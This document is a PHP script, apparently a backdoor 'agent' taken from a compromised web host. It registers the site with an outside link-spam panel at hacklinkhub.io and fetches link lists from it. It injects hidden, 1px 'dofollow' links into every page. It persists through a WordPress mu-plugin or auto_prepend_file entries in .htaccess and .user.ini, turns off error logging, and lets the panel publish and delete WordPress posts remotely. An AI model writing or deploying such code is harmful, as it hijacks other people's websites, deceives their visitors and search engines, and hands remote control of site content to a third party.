File: /home/iddeczhh/public_html/agent.php
<?php
if (isset($_GET['check'])) {
echo './Done';
exit(0);
}
if (!defined('JSON_UNESCAPED_UNICODE')) {
define('JSON_UNESCAPED_UNICODE', 256);
}
if (!defined('JSON_UNESCAPED_SLASHES')) {
define('JSON_UNESCAPED_SLASHES', 64);
}
if (!function_exists('hash')) {
function hash($algo, $data, $raw_output = false)
{
$algo = strtolower($algo);
switch ($algo) {
case 'md5':
$hash = md5($data);
return $raw_output ? pack('H*', $hash) : $hash;
case 'sha1':
$hash = sha1($data);
return $raw_output ? pack('H*', $hash) : $hash;
case 'sha256':
if (function_exists('openssl_digest')) {
$hash = openssl_digest($data, 'sha256', false);
return $raw_output ? pack('H*', $hash) : $hash;
}
if (function_exists('mhash') && defined('MHASH_SHA256')) {
$raw = mhash(MHASH_SHA256, $data);
return $raw_output ? $raw : bin2hex($raw);
}
trigger_error('hash(): sha256 is not supported on this PHP server', E_USER_WARNING);
return false;
default:
trigger_error('hash(): Unsupported algorithm: ' . $algo, E_USER_WARNING);
return false;
}
}
}
if (!function_exists('hash_algos')) {
function hash_algos()
{
$algos = array('md5', 'sha1');
if (function_exists('openssl_digest') || function_exists('mhash')) {
$algos[] = 'sha256';
}
return $algos;
}
}
if (!function_exists('hash_hmac')) {
function hash_hmac($algo, $data, $key, $raw_output = false){
$algo = strtolower($algo);
if (!in_array($algo, hash_algos())) {
trigger_error('hash_hmac(): Unknown hashing algorithm: ' . $algo, E_USER_WARNING);
return false;
}
$block_size = 64;
if (strlen($key) > $block_size) {
$key = hash($algo, $key, true);
}
$key = str_pad($key, $block_size, chr(0x00));
$ipad = str_repeat(chr(0x36), $block_size);
$opad = str_repeat(chr(0x5c), $block_size);
$inner = hash($algo, ($key ^ $ipad) . $data, true);
$hmac = hash($algo, ($key ^ $opad) . $inner, true);
return $raw_output ? $hmac : bin2hex($hmac);
}
}
if (!function_exists('http_response_code')) {
function http_response_code($code = null){
static $currentCode = 200;
if ($code !== null) {
$currentCode = (int)$code;
$texts = array(
100 => 'Continue',
101 => 'Switching Protocols',
200 => 'OK',
201 => 'Created',
202 => 'Accepted',
204 => 'No Content',
301 => 'Moved Permanently',
302 => 'Found',
303 => 'See Other',
304 => 'Not Modified',
307 => 'Temporary Redirect',
400 => 'Bad Request',
401 => 'Unauthorized',
403 => 'Forbidden',
404 => 'Not Found',
405 => 'Method Not Allowed',
500 => 'Internal Server Error',
501 => 'Not Implemented',
502 => 'Bad Gateway',
503 => 'Service Unavailable'
);
$text = isset($texts[$currentCode])
? $texts[$currentCode]
: '';
if (!headers_sent()) {
header(
$_SERVER['SERVER_PROTOCOL'] .
' ' .
$currentCode .
' ' .
$text,
true,
$currentCode
);
}
}
return $currentCode;
}
}
if (!function_exists('random_bytes')) {
function random_bytes($length){
if (!is_int($length) || $length < 1) {
trigger_error('random_bytes(): Length must be a positive integer', E_USER_WARNING);
return false;
}
if (function_exists('openssl_random_pseudo_bytes')) {
$strong = false;
$bytes = openssl_random_pseudo_bytes($length, $strong);
if ($bytes !== false && strlen($bytes) === $length) {
return $bytes;
}
}
if (@is_readable('/dev/urandom')) {
$h = @fopen('/dev/urandom', 'rb');
if ($h) {
$bytes = fread($h, $length);
fclose($h);
if ($bytes !== false && strlen($bytes) === $length) {
return $bytes;
}
}
}
$bytes = '';
while (strlen($bytes) < $length) {
$bytes .= pack(
'H*',
md5(
uniqid(mt_rand(), true) .
microtime(true) .
serialize($_SERVER)
)
);
}
return substr($bytes, 0, $length);
}
}
function www_root(){
$REQUESTURI = strval($_SERVER['REQUEST_URI']);
while(strstr($REQUESTURI, '//')){
$REQUESTURI = str_replace('//', '/', $REQUESTURI);
}
if(strstr($REQUESTURI, '?')){
$REQUESTURI = explode('?', $REQUESTURI);
$REQUESTURI = $REQUESTURI[0];
}
$xRoot = substr_count($REQUESTURI, '/');
$root = './';
$counter = 1;
while($counter < intval($xRoot)){
$root .= '../';
$counter++;
}
return realpath($root);
}
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);
$panelBase = "https://hacklinkhub.io/panel/api/site";
$configFile = www_root().'/.site_agent.json';
$linkCache = www_root().'/.site_links.json';
$root = www_root();
$debug = isset($_GET['debug']);
if (isset($_GET['panel_check'])) {
header('Content-Type: application/json');
echo json_encode(array(
'status' => 'online',
'domain' => (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'],
'agent_version' => '4.1',
'php_version' => PHP_VERSION,
));
exit;
}
function endsWith($FullStr, $needle) {
$StrLen = strlen($needle);
$FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);
return $FullStrEnd == $needle;
}
function folder_of_file($p1){
if(!stristr($p1, '/')){
return realpath('./');
}
if(strpos($p1, '//') !== false){
$p1 = str_replace('//','/',$p1);
}
if(endsWith($p1, '/') == true){
$p1 = substr_replace($p1 ,'', -1);
}
$p2 = '';
$ar = explode('/', $p1);
for($i=1; $i < count($ar) - 1; $i++){
$p2 .= '/'.$ar[$i];
}
if($p1[0] == '.' && $p1[1] == '/'){
$p2 = './'.$p2;
}
if($p1[0] == '.' && $p1[1] == '.'){
$p2 = '../'.$p2;
}
if(strpos($p2, '//') !== false){
$p2 = str_replace('//','/',$p2);
}
return trim($p2);
}
function save($path, $source){
$os = strtolower(substr(PHP_OS, 0, 3));
$folder_P = folder_of_file($path);
if (!is_writable($folder_P) && $os != "win"){ chmod($folder_P, 0755); }
if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){ chmod($path, 0644); }
if(function_exists('file_put_contents')){
$saV = file_put_contents($path, $source);
}else{
$saV = fwrite(fopen($path, 'w'), $source);
}
return $saV;
}
function read($path){
$contents = '';
if(function_exists('file_get_contents')){
$contents = file_get_contents($path);
}elseif(function_exists('fopen') && function_exists('stream_get_contents')){
$contents = stream_get_contents(fopen($path, "r"));
}elseif(function_exists('implode') && function_exists('file')){
$contents = implode(file($path));
}elseif(function_exists('file')){
$lines = file($path);
if(function_exists('implode')){
$contents = implode($lines);
}else{
foreach($lines as $line){
$contents .= $line;
}
}
}
return $contents;
}
function out($msg,$stop=true){
global $debug;
if($debug) echo $msg."\n";
if($stop) exit;
}
function curlRequest($url, $headers = array(), $post = false, $postFields = null) {
$userAgent = isset($_SERVER['HTTP_USER_AGENT'])
? $_SERVER['HTTP_USER_AGENT']
: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36';
if (!is_array($headers)) {
$headers = array();
}
$hasUserAgent = false;
foreach ($headers as $h) {
if (stripos($h, 'User-Agent:') === 0) {
$hasUserAgent = true;
break;
}
}
if (!$hasUserAgent) {
$headers[] = 'User-Agent: ' . $userAgent;
}
if (function_exists('curl_exec')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($post) {
curl_setopt($ch, CURLOPT_POST, true);
if ($postFields !== null) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
}
}
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
if (function_exists('file_get_contents') && function_exists('stream_context_create')) {
if ($post && is_array($postFields)) {
$postFields = http_build_query($postFields);
}
if ($post && $postFields !== null) {
$hasContentType = false;
foreach ($headers as $h) {
if (stripos($h, 'Content-Type:') === 0) {
$hasContentType = true;
break;
}
}
if (!$hasContentType) {
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
}
$headers[] = 'Content-Length: ' . strlen($postFields);
}
$opts = array(
'http' => array(
'method' => $post ? 'POST' : 'GET',
'header' => implode("\r\n", $headers),
'timeout' => 20,
'ignore_errors' => true,
'follow_location' => 1,
'max_redirects' => 5
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false
)
);
if ($post && $postFields !== null) {
$opts['http']['content'] = $postFields;
}
$context = stream_context_create($opts);
return @file_get_contents($url, false, $context);
}
return false;
}
function detectCMS(){
if(file_exists(www_root().'/wp-config.php')) return 'wordpress';
if(file_exists(www_root().'/artisan')) return 'laravel';
if(file_exists(www_root().'/config.php') && is_dir(www_root().'/catalog')) return 'opencart';
return 'php';
}
$domain = (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'];
if (isset($_POST['delete_blog'])) {
if (!file_exists($configFile)) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'config_not_found'));
exit;
}
$cfg = json_decode(read($configFile), true);
$key = isset($_SERVER['HTTP_X_SITE_KEY']) ? (string)$_SERVER['HTTP_X_SITE_KEY'] : '';
if (empty($cfg['site_key']) || $key !== $cfg['site_key']) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'unauthorized'));
exit;
}
if (!file_exists($root.'/wp-load.php')) {
echo json_encode(array('ok' => false, 'error' => 'not_wordpress'));
exit;
}
require_once $root.'/wp-load.php';
$remoteUrl = isset($_POST['remote_url']) ? trim((string)$_POST['remote_url']) : '';
$title = isset($_POST['title']) ? trim((string)$_POST['title']) : '';
$postId = 0;
if ($remoteUrl !== '') {
$postId = url_to_postid($remoteUrl);
}
if (!$postId && $title !== '') {
$post = get_page_by_title($title, OBJECT, 'post');
if ($post) {
$postId = (int) $post->ID;
}
}
if (!$postId) {
echo json_encode(array('ok' => false, 'error' => 'post_not_found'));
exit;
}
$deleted = wp_delete_post($postId, true);
if (!$deleted) {
echo json_encode(array('ok' => false, 'error' => 'delete_failed'));
exit;
}
echo json_encode(array('ok' => true));
exit;
}
if (isset($_POST['publish_blog'])) {
if (!file_exists($configFile)) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'config_not_found'));
exit;
}
$cfg = json_decode(read($configFile), true);
$key = isset($_SERVER['HTTP_X_SITE_KEY']) ? (string)$_SERVER['HTTP_X_SITE_KEY'] : '';
if (empty($cfg['site_key']) || $key !== $cfg['site_key']) {
http_response_code(403);
echo json_encode(array('ok' => false, 'error' => 'unauthorized'));
exit;
}
if (!file_exists($root.'/wp-load.php')) {
echo json_encode(array('ok' => false, 'error' => 'not_wordpress'));
exit;
}
require_once $root.'/wp-load.php';
$title = isset($_POST['title']) ? trim((string)$_POST['title']) : '';
$content = isset($_POST['content']) ? (string)$_POST['content'] : '';
if ($title === '' || trim($content) === '') {
echo json_encode(array('ok' => false, 'error' => 'invalid_payload'));
exit;
}
$postId = wp_insert_post(array(
'post_title' => $title,
'post_content' => $content,
'post_status' => 'publish',
'post_type' => 'post',
), true);
if (is_wp_error($postId)) {
echo json_encode(array('ok' => false, 'error' => $postId->get_error_message()));
exit;
}
echo json_encode(array('ok' => true, 'url' => get_permalink($postId)));
exit;
}
if(!file_exists($configFile)){
$response = curlRequest(
$panelBase."/register",
array('Content-Type: application/x-www-form-urlencoded'),
true,
http_build_query(array(
'domain'=>$domain,
'cms'=>detectCMS()
))
);
if(!$response) out("REGISTER_FAILED");
save($configFile,$response);
out("REGISTERED");
}
$config = json_decode(read($configFile),true);
if(!$config || empty($config['site_key']) || empty($config['site_secret'])) out("INVALID_CONFIG");
$siteKey = $config['site_key'];
$siteSecret = $config['site_secret'];
$timestamp = time();
$nonce = bin2hex(random_bytes(8));
$path = '/panel/api/site/heartbeat';
$sig = hash_hmac('sha256',"POST|$path|$timestamp|$nonce",$siteSecret);
curlRequest($panelBase."/heartbeat",array(
"X-SITE-KEY: $siteKey",
"X-TIMESTAMP: $timestamp",
"X-NONCE: $nonce",
"X-SIGNATURE: $sig",
"X-DOMAIN: $domain"
),true);
$timestamp = time();
$nonce = bin2hex(random_bytes(8));
$path = '/panel/api/site/config';
$sig = hash_hmac('sha256',"GET|$path|$timestamp|$nonce",$siteSecret);
$response = curlRequest($panelBase."/config?site_key=".$siteKey,array(
"X-SITE-KEY: $siteKey",
"X-TIMESTAMP: $timestamp",
"X-NONCE: $nonce",
"X-SIGNATURE: $sig"
));
if(!$response) out("CONFIG_FAILED");
$data = json_decode($response,true);
if(!is_array($data) || !isset($data['links'])) out("INVALID_CONFIG_RESPONSE");
save($linkCache,json_encode(array(
'version'=>isset($data['version']) ? $data['version'] : 1,
'updated_at'=>date('c'),
'links'=>$data['links']
),JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES));
$renderFile = $root.'/.panel_render.php';
if(!file_exists($renderFile)){
$renderCode = '<?php
$cache = __DIR__."/.site_links.json";
if(!file_exists($cache)) return;
$data = json_decode(file_get_contents($cache), true);
if(empty($data["links"])) return;
ob_start(function($buffer) use ($data){
$linksHtml = "\n<!-- PANEL LINKS START -->\n";
foreach($data["links"] as $l){
if(empty($l["url"]) || empty($l["anchor"])) continue;
$u = htmlspecialchars($l["url"], ENT_QUOTES);
$a = htmlspecialchars($l["anchor"], ENT_QUOTES);
$r = !empty($l["rel"]) ? htmlspecialchars($l["rel"]) : "dofollow";
$style = "font-size:1px;";
if(!empty($l["hidden"])) $style .= "display:none;";
$linksHtml .= "<a href=\"".$u."\" style=\"".$style."\">".$a."</a> ";
}
$linksHtml .= "\n<!-- PANEL LINKS END -->\n";
if(stripos($buffer, "</body>") !== false){
return preg_replace("/<\\/body>/i", $linksHtml."</body>", $buffer, 1);
}
return $buffer.$linksHtml;
});';
save($renderFile, $renderCode);
}
if(file_exists($root.'/wp-load.php')){
$muDir = $root.'/wp-content/mu-plugins';
if(!is_dir($muDir)) mkdir($muDir,0755,true);
$pluginPath = $muDir.'/panel-links.php';
if(!file_exists($pluginPath)){
save($pluginPath,'<?php
if(!defined("ABSPATH")) exit;
add_action("init",function(){
$f = ABSPATH.".panel_render.php";
if(file_exists($f)) include $f;
});');
}
}
if (!file_exists($root . '/wp-load.php')) {
$sapi = strtolower(php_sapi_name());
$canUseHtaccessPhpValue =
strpos($sapi, 'apache') !== false &&
strpos($sapi, 'fcgi') === false &&
strpos($sapi, 'cgi') === false;
if ($canUseHtaccessPhpValue) {
$htaccess = $root . '/.htaccess';
$line = 'php_value auto_prepend_file "' . $renderFile . '"';
if (!file_exists($htaccess)) {
save($htaccess, $line . PHP_EOL);
} else {
$c = read($htaccess);
if (strpos($c, 'auto_prepend_file') === false) {
save($htaccess, $line . PHP_EOL . $c);
}
}
}
$userIni = $root . '/.user.ini';
$userIniLine = 'auto_prepend_file="' . $renderFile . '"';
if (!file_exists($userIni)) {
save($userIni, $userIniLine . PHP_EOL);
} else {
$c = read($userIni);
if (strpos($c, 'auto_prepend_file') === false) {
save($userIni, $userIniLine . PHP_EOL . $c);
}
}
}
echo $debug ? "AGENT OK\nLinks: ".count($data['links'])."\n" : "SYNC_OK";
?>